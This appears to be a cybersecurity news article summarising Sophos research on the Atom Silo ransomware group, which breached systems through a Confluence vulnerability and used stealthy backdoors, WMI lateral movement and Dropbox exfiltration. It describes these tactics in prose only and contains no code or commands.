Using only native Windows tools and avoiding the use of backdoors as services, the group thrived on unpatched, recent vulnerabilities.
A new ransomware group has been detected—one that was first spotted in a sophisticated attack that took place over two days and leveraged a recently revealed vulnerability in Atlassian’s collaboration software.
Named the Atom Silo group, the novel ransomware techniques and tools used were found to be virtually by researchers to be identical to LockFile. The difference was that their intrusion stage involved several novel techniques and complex manoeuvres to evade detection and complete the attack.
For instance, once the operators had gained initial access via a backdoor into the Confluence server, they were able to drop and install a second, stealthy backdoor. This backdoor used an executable from a legitimate third-party software product that was vulnerable to DLL ‘side-load’ attacks, to execute the backdoor code:
- The ransomware payload included a malicious kernel driver designed to disrupt endpoint protection software
- The backdoor connected to a remote command-and-control server over TCP/IP port 80 and allowed for remote execution of Windows shell commands through the Windows Management Interface (WMI)
The attackers then moved laterally through the network and compromised additional servers, installing additional backdoors through the WMI interface, using a compromised administrative account. For the most part, the attackers avoided installing these backdoors as services.
Researchers believe the attackers did this to avoid detection by security controls. The attackers also used remote desktop services to find, copy (using RClone) and exfiltrate data to Dropbox. The ransomware executable was released after exfiltration—at the same time as the release of another file designed to disrupt endpoint protection.
According to Sean Gallagher, Senior Threat Researcher, Sophos, the firm that published this research: “This ultra-stealthy adversary was unknown a few weeks ago. Atom Silo has emerged with its own bag of novel and sophisticated tactics, techniques and procedures that were full of twists and turns and challenging to spot, in addition to significant efforts made to evade detection prior to launching the ransomware, which included well-worn techniques used in new ways.”
Gallagher added that, other than the backdoors themselves, the attackers used only native Windows tools and resources to move within the network until they deployed the ransomware: “This incident is also a good reminder how dangerous publicly disclosed security vulnerabilities in internet-facing software are when left unpatched, even for a relatively short time. In this case, the vulnerability opened the door to two simultaneous, but unrelated attacks from ransomware and an unrelated crypto-miner.”